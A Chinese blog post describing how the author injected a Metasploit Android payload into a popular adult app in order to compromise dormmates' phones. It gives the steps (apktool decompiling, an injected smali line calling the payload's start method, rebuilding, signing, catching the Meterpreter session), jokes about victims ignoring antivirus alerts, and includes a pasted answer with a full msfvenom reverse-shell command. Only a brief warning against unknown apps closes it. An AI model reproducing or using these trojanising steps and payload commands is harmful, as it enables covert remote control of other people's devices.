突发奇想对某某天堂进行后门植入,反弹msf

咱们寝室基本人手一个某某天堂,所以打算安排一下室友,感觉自己好邪恶ƪ(˘⌣˘)ʃ优雅。
首先msf生成木马文件muma.apk
在这里插入图片描述
然后对某某天堂和木马apk进行反编译,我这里用的是apktool:
在这里插入图片描述
然后得到两个文件夹
在这里插入图片描述
打开JMX找到AndroidManifest.xml文件打开,找到软件入口,软件入口一般在android.intent.action.MAIN的上面
在这里插入图片描述
软件入口:
在这里插入图片描述
找到入口对应的smali文件(软件入口把点换成/就能找到对应的smali文件)
在这里插入图片描述
直接搜索onCreat函数,找到bundle对象,你并在下面添加启动payload代码:invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
在这里插入图片描述
添加好后把payload的smail/com/metasploit文件复制到某某天堂的smail_classes2/com/目录下
在这里插入图片描述
然后用apktool进行编译:
在这里插入图片描述
签名:
在这里插入图片描述
手机进行安装:
在这里插入图片描述
手机能正常安装,也不管有没有报毒毕竟哪家H不报毒呢ƪ(˘⌣˘)ʃ优雅,lsp们还不是照样安装。
电脑打开msf进行监听:
在这里插入图片描述
手机打开软件:
在这里插入图片描述
msf成功上线:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
能正常执行命令。
所以兄弟们千万不要下载来路不明的软件,如果非要使用可以用vmos虚拟机打开。结束♥(。→v←。)♥

  • 8
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
回答: 反弹shell是一种利用Metasploit Framework (MSF)进行攻击的技术。它的原理是在目标主机上执行一个经过精心构造的客户端,使目标主机主动连接攻击者的机器的某个端口。使用MSF进行反弹shell的过程如下:首先使用msfvenom模块生成一个被控端的客户端文件,具体命令如下:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=xxx.xxx.xxx.xxx(攻击机IP) lport=xxxx(监听端口)-f exe -o xx.exe。然后将生成的被控端文件放到目标主机内,并在目标主机内执行。此时,攻击者的机器就可以收到目标主机的session,在MSF中使用sessions命令即可查看当前收到的session,并使用session 1命令获取第一个session的会话,然后使用meterpreter模块中的shell命令即可实现反弹shell。\[1\] #### 引用[.reference_title] - *1* *3* [使用msf进行反弹shell+内网渗透](https://blog.csdn.net/JSMaster01/article/details/85402292)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [msf反弹shell](https://blog.csdn.net/weixin_34179762/article/details/93196297)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值